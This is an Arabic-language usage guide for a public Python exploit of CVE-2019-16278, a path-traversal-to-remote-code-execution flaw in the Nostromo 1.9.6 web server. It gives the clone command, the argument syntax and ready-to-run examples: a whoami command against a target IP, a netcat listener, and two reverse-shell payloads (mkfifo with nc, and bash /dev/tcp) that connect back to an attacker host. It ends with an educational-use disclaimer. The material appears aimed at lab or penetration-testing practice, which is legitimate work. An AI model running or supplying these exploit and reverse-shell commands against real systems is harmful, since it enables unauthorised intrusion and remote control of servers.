
يمكن لمهاجم غير مصادَق إجبار الخادم على الإشارة إلى ملف شل مثل '/bin/sh' وتنفيذ أوامر عشوائية بسبب الفشل في التحقق من عنوان URL، مما يؤدي إلى اجتياز المسار إلى أي ملف موجود في النظام. تفشل إصدارات Nostromo مثل 1.9.6 في التحقق من عنوان URL هذا.
POC
Repository: https://github.com/CybermonkX/CVE-2019-16278_Nostromo-1.9.6---Remote-Code-Execution.git
يحتوي هذا المستودع على إكسبلويت مكتوب بلغة Python لثغرة CVE-2019-16278، وهي ثغرة في Nostromo 1.9.6 (خادم ويب). تسمح هذه الثغرة بتنفيذ أوامر عن بُعد (Remote Code Execution - RCE) عبر استغلال اجتياز المسار (Directory Traversal) لتنفيذ أوامر عشوائية على النظام المستهدف.
git clone https://github.com/CybermonkX/CVE-2019-16278_Nostromo-1.9.6---Remote-Code-Execution.git
cd CVE-2019-16278_Nostromo-1.9.6---Remote-Code-Execution
الخطوة 2: تشغيل الاستغلال
python3 CVE-2019-16278.py -t <TARGET_IP> -p -c "" [-b <BYTES_TO_READ>]
الوسائط: الوسيط الوصف مطلوب الافتراضي -t, --target عنوان IP الخاص بالهدف نعم لا شيء -p, --port منفذ الهدف نعم لا شيء -c, --command الأمر الذي سيتم تنفيذه على الخادم نعم لا شيء -b, --bytes عدد البايتات التي سيتم قراءتها من الاستجابة لا 4096
🧑💻 أمثلة مثال 1: تشغيل whoami على الهدف
python3 CVE-2019-16278.py -t 10.10.10.165 -p 80 -c "whoami"
مثال 2: شل عكسي باستخدام Netcat
الخطوة 1: شغّل مستمع Netcat على جهازك المهاجم:
nc -lvnp 443
الخطوة 2: نفّذ الاستغلال باستخدام حمولة شل عكسي:
python3 CVE-2019-16278.py -t 10.10.10.165 -p 80 -c "rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc 10.10.16.5 443 > /tmp/f"
مثال 3: شل عكسي باستخدام /dev/tcp
python3 CVE-2019-16278.py -t 10.10.10.165 -p 80 -c "bash -i >& /dev/tcp/10.10.16.5/443 0>&1"
🔍 تفاصيل الثغرة
CVE: CVE-2019-16278
Affected Software: Nostromo 1.9.6 Web Server
Type: Directory Traversal -> Remote Code Execution
⚠️ إخلاء المسؤولية
هذه الأداة مخصصة للأغراض التعليمية فقط. لا تستخدمها على أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها. الوصول غير المصرح به إلى الأنظمة غير قانوني. استخدمها بمسؤولية.